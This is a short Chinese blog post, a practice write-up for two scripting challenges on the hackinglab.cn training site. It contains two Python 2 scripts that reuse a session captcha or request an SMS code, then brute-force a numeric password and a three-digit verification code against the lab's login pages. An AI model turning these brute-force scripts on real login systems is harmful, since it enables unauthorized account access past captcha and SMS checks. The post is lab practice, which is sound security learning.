闲着无事跟着某同学在hackinglab.cn上做两道脚本题练手 就是模拟POST发包而已

 

  4-大致上是每次访问index.php相对应一个验证码,只要不重新访问这个页面,用同一个验证码即可。于是代码模拟访问这个页面,获取cookie,再暴力密码post

  11-思路相近,查看源码推测是post到vcode.php对应一个验证码,所以暴力之前post到这个php一次  

    PS:需要暴力两个电话号码

  

#!/bin/env python
import urllib, urllib2, cookielib

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
response = urllib2.urlopen('http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php')
print response.read()

username="admin"
pwd=1
vcode=""
submit="submit"

vcode = raw_input()

data = {'username': username,
        'pwd':  pwd,
        'vcode': vcode,
        'submit': submit,
        }

for i in range(10000, 1000, -1):
    data['pwd'] = i
    f = urllib2.urlopen(
        url = 'http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php',
        data = urllib.urlencode(data),
        )
    if 'error' not in f.read():
        print 'answer is %d' % i
        break
#!/bin/env python
import urllib, urllib2, cookielib

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
response = urllib2.urlopen('http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/#')
print response.read()
response = urllib2.urlopen(
        url = 'http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php',
        data = urllib.urlencode({'getcode':1, 'mobi':13399999999})
        )
print response.read()

username="13399999999"
vcode=""
submit="submit"

data = {'username': username,
        'vcode': vcode,
        'Login': submit,
        }

for i in range(100, 1000):
    data['vcode'] = i
    f = urllib2.urlopen(
        url = 'http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php',
        data = urllib.urlencode(data),
        )
    print f.read()
    """
    if 'error' not in f.read():
        print 'answer is %d' % i
        break
    """

 

posted on 2015-02-18 01:37  Gemmeg  阅读(314)  评论(0编辑  收藏  举报